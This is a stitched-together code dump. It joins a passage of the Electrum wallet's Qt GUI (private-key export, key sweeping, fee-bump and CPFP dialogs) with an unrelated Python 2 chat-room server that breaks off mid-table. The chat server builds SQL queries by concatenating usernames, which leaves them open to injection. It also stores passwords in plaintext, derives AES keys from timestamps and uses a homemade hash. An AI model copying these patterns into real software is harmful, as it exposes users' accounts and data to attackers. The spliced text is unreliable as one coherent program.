scan_qrcode(parent=self.top_level_window(), config=self.config, callback=cb)
def read_tx_from_file(self) -> Optional[Transaction]:
fileName = getOpenFileName(
parent=self,
title=_("Select your transaction file"),
filter=TRANSACTION_FILE_EXTENSION_FILTER_ANY,
config=self.config,
)
if not fileName:
return
try:
with open(fileName, "rb") as f:
file_content = f.read() # type: Union[str, bytes]
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason),
title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(
parent=self,
title=_('Input raw transaction'),
header_layout=_("Transaction:"),
ok_label=_("Load transaction"),
config=self.config,
)
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_text_channel_backup(self):
text = text_dialog(
parent=self,
title=_('Input channel backup'),
header_layout=_("Channel Backup:"),
ok_label=_("Load backup"),
config=self.config,
)
if not text:
return
if text.startswith('channel_backup:'):
self.import_channel_backup(text)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
raw_tx = self._fetch_tx_from_network(txid)
if not raw_tx:
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
def _fetch_tx_from_network(self, txid: str) -> Optional[str]:
if not self.network:
self.show_message(_("You are offline."))
return
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except UntrustedServerReturnedError as e:
self.logger.info(f"Error getting transaction from network: {repr(e)}")
self.show_message(_("Error getting transaction from network") + ":\n" + e.get_message_for_gui())
return
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
return raw_tx
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
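# the export runs in a worker thread; progress and completion come back to the GUI
# through the computing_privkeys/show_privkeys signals, while the done/cancelled
# flags let the dialog's close handler stop the worker cleanly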
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join(map(lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
os.chmod(fileName, 0o600)
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), self.wallet.import_labels, on_import)
def do_export_labels(self):
export_meta_gui(self, _('labels'), self.wallet.export_labels)
def import_invoices(self):
import_meta_gui(self, _('invoices'), self.wallet.import_invoices, self.invoice_list.update)
def export_invoices(self):
export_meta_gui(self, _('invoices'), self.wallet.export_invoices)
def import_requests(self):
import_meta_gui(self, _('requests'), self.wallet.import_requests, self.request_list.update)
def export_requests(self):
export_meta_gui(self, _('requests'), self.wallet.export_requests)
def import_contacts(self):
import_meta_gui(self, _('contacts'), self.contacts.import_file, self.contact_list.update)
def export_contacts(self):
export_meta_gui(self, _('contacts'), self.contacts.export_file)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True, config=self.config)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address_for_corruption(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
privkeys = get_pk()
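# sweep_preparations (run on the network thread) locates the UTXOs spendable by the
# entered keys; the resulting coins and keypairs feed the normal on-chain payment
# dialog, which sends everything ('!') to the chosen address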
def on_success(result):
coins, keypairs = result
outputs = [PartialTxOutput.from_address_and_value(addr, value='!')]
self.warn_if_watching_only()
self.pay_onchain_dialog(coins, outputs, external_keypairs=keypairs)
def on_failure(exc_info):
self.on_error(exc_info)
msg = _('Preparing sweep transaction...')
task = lambda: self.network.run_from_another_thread(
sweep_preparations(privkeys, self.network))
WaitingDialog(self, msg, task, on_success, on_failure)
def _do_import(self, title, header_layout, func):
text = text_dialog(
parent=self,
title=title,
header_layout=header_layout,
ok_label=_('Import'),
allow_multi=True,
config=self.config,
)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
from .settings_dialog import SettingsDialog
d = SettingsDialog(self, self.config)
self.alias_received_signal.connect(d.set_alias_color)
d.exec_()
self.alias_received_signal.disconnect(d.set_alias_color)
if self.fx:
self.fx.trigger_update()
run_hook('close_settings_dialog')
if d.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# note that closeEvent is NOT called if the user quits with Ctrl-C
self.clean_up()
event.accept()
def clean_up(self):
if self._cleaned_up:
return
self._cleaned_up = True
if self.wallet.thread:
self.wallet.thread.stop()
self.wallet.thread = None
util.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.db.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.wallet.db.put("qt-console-history", self.console.history[-50:])
if self.qr_window:
self.qr_window.close()
self.close_wallet()
if self._update_check_thread:
self._update_check_thread.exit()
self._update_check_thread.wait()
if self.tray:
self.tray = None
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p: Optional['BasePlugin'], name: str, i: int):
widget = settings_widgets.get(name) # type: Optional[QWidget]
if widget and not p:
# plugin got disabled, rm widget
grid.removeWidget(widget)
widget.setParent(None)
settings_widgets.pop(name)
elif widget is None and p and p.requires_settings() and p.is_enabled():
# plugin got enabled, add widget
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
# note: all enabled plugins will receive this hook:
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp_dialog(self, parent_tx: Transaction) -> None:
new_tx = self.wallet.cpfp(parent_tx, 0)
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_txid = parent_tx.txid()
assert parent_txid
parent_fee = self.wallet.get_tx_fee(parent_txid)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
combined_fee = QLabel('')
combined_feerate = QLabel('')
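# the child's fee comes out of the swept input, so output amount = input - child fee;
# the combined feerate shown is (parent fee + child fee) over the size of both txs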
def on_fee_edit(x):
fee_for_child = fee_e.get_amount()
if fee_for_child is None:
return
out_amt = max_fee - fee_for_child
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_for_child
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb: Optional[int]) -> Optional[int]:
if fee_per_kb is None:
return None
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = round(fee)
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(fee_combo, 4, 2)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee is None:
return # fee left empty, treat it as "cancel"
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
try:
new_tx = self.wallet.cpfp(parent_tx, fee)
except CannotCPFP as e:
self.show_error(str(e))
return
self.show_transaction(new_tx)
def _add_info_to_tx_from_wallet_and_network(self, tx: PartialTransaction) -> bool:
"""Returns whether successful."""
# note side-effect: tx is being mutated
assert isinstance(tx, PartialTransaction)
try:
# note: this might download input utxos over network
BlockingWaitingDialog(
self,
_("Adding info to tx, from wallet and network..."),
lambda: tx.add_info_from_wallet(self.wallet, ignore_network_issues=False),
)
except NetworkException as e:
self.show_error(repr(e))
return False
return True
def bump_fee_dialog(self, tx: Transaction):
txid = tx.txid()
if not isinstance(tx, PartialTransaction):
tx = PartialTransaction.from_tx(tx)
if not self._add_info_to_tx_from_wallet_and_network(tx):
return
d = BumpFeeDialog(main_window=self, tx=tx, txid=txid)
d.run()
def dscancel_dialog(self, tx: Transaction):
txid = tx.txid()
if not isinstance(tx, PartialTransaction):
tx = PartialTransaction.from_tx(tx)
if not self._add_info_to_tx_from_wallet_and_network(tx):
return
d = DSCancelDialog(main_window=self, tx=tx, txid=txid)
d.run()
def save_transaction_into_wallet(self, tx: Transaction):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.save_db()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
def show_cert_mismatch_error(self):
if self.showing_cert_mismatch_error:
return
self.showing_cert_mismatch_error = True
self.show_critical(title=_("Certificate mismatch"),
msg=_("The SSL certificate provided by the main server did not match the fingerprint passed in with the --serverfingerprint option.") + "\n\n" +
_("Electrum will now exit."))
self.showing_cert_mismatch_error = False
self.close()
ChatRoom2.0Server.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import base64
import datetime
import getpass
import os
import Queue
import socket
import sqlite3
import subprocess
import sys
import time
import threading
from cmd import Cmd
from Crypto.Cipher import AES
from Crypto import Random
#Created by Camerin Figueroa
cv = "2.0"
q = Queue.Queue()
q.put([[]])
errors = Queue.Queue()
errors.put([])
motd = Queue.Queue()
quit = Queue.Queue()
quit.put("")
mesg = Queue.Queue()
mesg.put("")
online = Queue.Queue()
online.put([])
print """\33[91m
═════════════════════════════════════════════════════════
███████ ██████ ███████
█ █ █ █ ║
█ █════╗ █ ╔═█ ║
█═════════════█ ╚█ ║█═══╝
█ ██████ ║█
█ █ █ ╚╗█ ╔═══════Server
█════════╗ █ █ ╚═█ ║
███████ ║ █ █ ███████
Chat Room Server════════╝
═════════════════════════════════════════════════════════
\33[92m"""
port = 99999
configcont = "#Replace Everything behind = sign\n#Ex before: config = edit\n#Ex after: config = configinput\n\nmotd = Hello world This is a new Chat Room Server made by Camerin Figueroa\nport = 22550\ndatabase = ./crdb.db"
if os.path.isfile('./crsconfig.txt') == True:
f = open('./crsconfig.txt', 'r')
configuration = f.read()
f.close()
configuration = configuration.split("\n")
for line in configuration:
if "motd =" in line:
motd.put(line[7:])
else:
pass
if "database =" in line:
dbdir = line[11:]
else:
pass
if "port = " in line:
port = int(line[7:])
else:
pass
else:
f = open('./crsconfig.txt', 'w')
f.write(configcont)
f.close()
print "Please edit crsconfig.txt"
sys.exit()
if port != 99999:
pass
else:
f = open('./crsconfig.txt', 'w')
f.write(configcont)
f.close()
print "Please edit crsconfig.txt"
sys.exit()
def console(q, errors, motd):
if __name__ == '__main__':
prompt = consoleprompt()
prompt.prompt = '> '
prompt.cmdloop('Starting prompt...')
class consoleprompt(Cmd):
def do_say(self, args):
if args == "" or args == " ":
print "say messagetosay\nor\nsay Message to say"
else:
curtime = str(int(time.time()))
curmes = mesg.get()
if curmes.split(":")[0] == curtime:
mesg.put(curmes)
else:
db = q.get()
db[1].append("OP" + ":" + args)
q.put(db)
mesg.put(curtime + ":" + "OP" + ":" + args)
def do_printdb(self, args):
global q
self.quit = quit
db = q.get()
q.put(db)
tick = 0
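# db[0] is the roster of [name, address] entries; db[1:] are per-user message lists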
for line in db:
for lin in line:
if tick == 0:
for li in lin:
print li
tick = 1
else:
print lin
def do_online(self, args):
global online
on = online.get()
online.put(on)
print "Online:"
for username in on:
print username
def do_printerrors(self, args):
global errors
erlist = errors.get()
errors.put(erlist)
print "Errors:"
for error in erlist:
print error
def do_motd(self, args):
if "-c" in args:
global motd
oldmotd = motd.get()
motd.put(args[3:])
print "motd changed from " + oldmotd + " to " + args[3:]
else:
print "add -c newcmd"
def do_quit(self, args):
global quit
print "Quitting.\33[97m"
quit.get()
quit.put("quitting:")
time.sleep(2)
os._exit(0)
def do_printdatabase(self, args):
conn = sqlite3.connect(dbdir)
c = conn.cursor()
print "Under Development"
def do_adduser(self, args):
if args == "":
print "adduser username"
print "password prompt will pop up once you run the command."
else:
global dbdir
conn = sqlite3.connect(dbdir)
c = conn.cursor()
c.execute("SELECT EXISTS(SELECT 1 FROM userbase WHERE username='" + args + "' LIMIT 1)")
if int(c.fetchall()[0][0]) == 1:
print "Username already used"
else:
c.execute("SELECT MAX(id) FROM userbase")
maxid = int(c.fetchall()[0][0])
c.execute("insert into userbase values('" + args + "', '" + getpass.getpass() + "', '" + str(maxid + 1) + "');")
conn.commit()
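# Server accepts TCP clients and runs a short handshake per connection:
# 1) version check ("cv:<version>"), 2) latency probe via ping,
# 3) AES session key derived from a timestamp string padded to 32 chars,
# 4) username lookup and yash()-hashed password check against the sqlite userbase.
# Clients that announced "screen:" become read-only viewers; the rest join the chat loop.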
class Server(object):
def __init__(self, host, port, q, motd, errors, mesg, quit, online, conn, c):
self.c = c
self.conn = conn
self.motd = motd
self.quit = quit
self.errors = errors
self.host = host
self.port = port
self.q = q
self.mesg = mesg
self.online = online
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind((self.host, self.port))
def listen(self):
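# one thread per accepted client; the 60 s socket timeout makes a silent peer's
# recv() raise eventually so the handler's except blocks can clean it up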
self.sock.listen(5)
while True:
try:
client, address = self.sock.accept()
client.settimeout(60)
threading.Thread(target = self.listenToClient,args = (client,address)).start()
except:
pass
def listenToClient(self, client, address):
global cv, now, dbdir
conn = sqlite3.connect(dbdir)
c = conn.cursor()
rcv = client.recv(128)
if str(cv) != str(rcv[3:]) and "cv:" in rcv and rcv != "screen:":
client.send("comp:0:" + str(cv))
error = self.errors.get()
error.append("Error client is wrong version")
self.errors.put(error)
kill1 = 1
else:
client.send("comp:1")
client.recv(1024)
client.send("ping")
time2 = int(round(time.time()*1000))
client.recv(1024)
time3 = int(round(time.time()*1000))
keytime = str(time.time())
hm = now.strftime("%H%M")
# round-trip latency is time3 - time2; reject clients slower than 250 ms
if time3 - time2 > 250:
error = self.errors.get()
error.append("Error ping is longer than 250 ms.")
self.errors.put(error)
client.send("ptl:250")
kill1 = 1
else:
pass
# pad the timestamp out to exactly 32 characters for use as the AES key (truncate if longer)
key = str(keytime)
if len(key) < 32:
key = key + "#" * (32 - len(key))
else:
key = key[:32]
encrypt = AESCipher(key)
usern = encrypt.decrypt(client.recv(1024))
uget = "SELECT username FROM userbase WHERE username = '" + usern + "';"
c.execute(uget)
users = c.fetchall()
ucheck = 0
for user in users:
if str(user[0]) == usern:
c.execute("SELECT username,yash,id FROM userbase WHERE username = '" + usern + "';")
userbase = c.fetchone()
else:
pass
kill = 0
try:
if userbase:
client.send(encrypt.encrypt("succ:sendek"))
else:
kill = 1
except:
client.send(encrypt.encrypt("err:nousername"))
client.close()
kill = 1
kill1 = 0
if kill == 0:
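# re-key the session cipher with yash(stored password) plus the server's startup
# HHMM (global 'now'), so a client that knows the password derives the same key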
encrypt = AESCipher(yash(str(userbase[1])) + hm)
syncmessage = encrypt.decrypt(client.recv(1024))
if len(syncmessage) == 10:
try:
int(syncmessage)
except:
client.send("kill:wpass")
#kill Connection
kill1 = 1
else:
client.send("kill:wpass")
#kill Connection
client.close()
kill1 = 1
if kill1 == 0:
client.send(encrypt.encrypt("pass:excepted"))
c.execute("insert into logs values('" + str(int(userbase[2])) + "', '" + str(userbase[0]) + " has logged in..." + "', '" + str(now.strftime("%Y:%M:%D:%H:%M:%S")) + "');")
else:
c.execute("insert into logs values('" + str(int(userbase[2])) + "', '" + str(userbase[0]) + " failed to login with on IP:" + str(address[0]) + "', '" + str(now.strftime("%Y:%M:%D:%H:%M:%S")) + "');")
conn.commit()
else:
rcv = "cv:n/a"
if kill1 == 1:
pass
elif str(cv) != rcv[3:] and "cv:" in rcv:
pass
elif rcv == "screen:":
online = self.online.get()
self.online.put(online)
client.send(encrypt.encrypt(str(online)))
cmessage = self.mesg.get()
self.mesg.put(cmessage)
lm = cmessage
tick = 0
qi = False
try:
while qi == False:
cmessage = self.mesg.get()
self.mesg.put(cmessage)
online = self.online.get()
self.online.put(online)
if cmessage != lm:
csend = cmessage.split(":")
client.send(encrypt.encrypt(csend[1] + ":" + csend[2]))
lm = cmessage
else:
pass
quit = self.quit.get()
self.quit.put(quit)
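# roughly once per second (1000 loops at ~1 ms sleep) push the online list and poll the viewer for a quit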
if tick == 1000:
client.send(encrypt.encrypt("online:" + str(online)))
onlinecheck = encrypt.decrypt(client.recv(1024))
if onlinecheck == "quitting:":
quit = "quitting:"
qi = True
else:
pass
tick = 0
else:
pass
tick = tick + 1
if quit == "quitting:":
client.send(encrypt.encrypt("quitting:"))
client.close()
qi = True
else:
pass
time.sleep(.001)
except:
error = self.errors.get()
error.append("A screen raised an error")
self.errors.put(error)
pass
else:
client.send(encrypt.encrypt("comp:1"))
name = encrypt.decrypt(client.recv(1024))
if "user:" not in name:
client.send(encrypt.encrypt("error:wrong type of packet received. 'user:' was not within the packet"))
erlist = self.errors.get()
erlist.append(str(client.getpeername()) + ":wrong type of packet received. 'user:' was not within the packet")
self.errors.put(erlist)
else:
name = name[5:]
used = False
online = self.online.get()
self.online.put(online)
for user in online:
if user == name:
used = True
else:
pass
if used == True:
client.send(encrypt.encrypt("error:Username has already been used before."))
client.close()
erlist = self.errors.get()
erlist.append(name + ":" + name + ":Username has already been used before.")
self.errors.put(erlist)
check = False
else:
client.send(encrypt.encrypt("user:" + name))
check = True
if check == True:
db = q.get()
q.put(db)
leng = 1
for nam in db[0]:
if name in nam:
nl = leng
else:
leng = leng + 1
if 'nl' in locals():
db[0][nl - 1].append(address)
else:
nl = leng
db.append([name,])
db[0].append([name, address])
q.get()
q.put(db)
try:
online = self.online.get()
online.append(name)
self.online.put(online)
warntim = 0
while True:
rmesg = encrypt.decrypt(client.recv(1024))
if "" == rmesg:
pass
elif "/help" == rmesg:
pass
elif "quitting:" == rmesg:
on = self.online.get()
on.remove(name)
self.online.put(on)
elif "ping:" == rmesg:
pass
elif "m3ssg::" in rmesg:
curtime = str(int(time.time()))
curmes = self.mesg.get()
if curmes.split(":")[0] == curtime:
self.mesg.put(curmes)
warntim = warntim + 1
if warntim == 100:
client.close()
else:
pass
else:
db = q.get()
db[nl].append(name + ":" + rmesg[7:])
q.put(db)
self.mesg.put(curtime + ":" + name + ":" + rmesg[7:])
else:
print "add this to log errors. unknown packet"
print rmesg
except:
online = self.online.get()
if name in online:
online.remove(name)
else:
pass
self.online.put(online)
else:
pass
def writeoutput(q, errors):
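# every 10 seconds, rewrite the session log with a snapshot of the message db and accumulated errors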
if os.path.isdir("./logs") == False:
subprocess.Popen(['mkdir', './logs'], stdout=subprocess.PIPE,).communicate()[0]
else:
pass
tim = str(datetime.datetime.now())
tim = tim.replace(" ", "")
log = "./logs/log" + tim + ".txt"
while True:
try:
time.sleep(10)
tta = q.get()
q.put(tta)
error = errors.get()
errors.put(error)
fw = "Users:\n"
errs = ""
for err in error:
errs = errs + err + "\n"
for line in tta:
for lin in line:
fw = fw + str(lin) + "\n"
fw = fw + "═════════════════════════════════════════════════════════\nErrors:\n" + errs
f = open(log, 'w')
f.write(fw)
f.close()
except:
error = errors.get()
error.append("Error while writing output\n")
errors.put(error)
#Added in Chat Room 2.0
if os.path.isfile(dbdir) == True:
dbexist = 1
else:
dbexist = 0
now = datetime.datetime.now()
conn = sqlite3.connect(dbdir)
c = conn.cursor()
if dbexist == 1:
pass
else:
print "Initializing database..."
time.sleep(1)
print "Please put a new username and password into the database..."
good = False
while good == False:
usern = raw_input("username:")
passw = getpass.getpass()
tmp = raw_input("Are you sure thats correct?(Y/N)")
if tmp == "y" or tmp == "Y" or tmp == "ye" or tmp == "YE" or tmp == "YES" or tmp == "Yes" or tmp == "YEs" or tmp == "yes" or tmp == "" or tmp == " ":
good = True
else:
pass
c.execute("CREATE TABLE userbase (username real, yash real, id real);")
c.execute("CREATE TABLE logs (id real, message real, timestamp real);")
c.execute("insert into userbase values('" + usern + "', '" + passw + "', '1');")
conn.commit()
def yash(inp):
# only strings can be hashed; bail out early on anything else
if not isinstance(inp, basestring):
print "Error this is not a string"
sys.exit()
tick = 0
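# hexlists: hard-coded substitution tables (hex codes of printable ASCII) used by the homemade yash() hash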
hexlists = [
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '26', '27', '28', '29', '20', '2a', '2b', '2c', '2d', '2e', '2f', '31', '32', '33', '34', '35', '36', '37', '38', '39', '30', '3a', '3b', '3c', '3d', '3e', '3f', '41', '42', '49', '21', '22', '23', '24', '25', '40', '4a', '4b', '4c', '4d', '4e', '4f', '51', '52', '53', '72', '73', '74', '75', '76', '77', '54', '55', '56', '57', '58', '59', '50', '5a', '5b', '5c', '5d', '5e', '5f', '61', '62', '63', '64', '43', '44', '45', '46', '47', '48', '65', '66', '67', '68', '69', '60', '6a', '6b', '6c', '6d', '6e', '6f', '71', '78', '79', '70', '7a', '7b', '7c', '7d', '7e', '7f'],
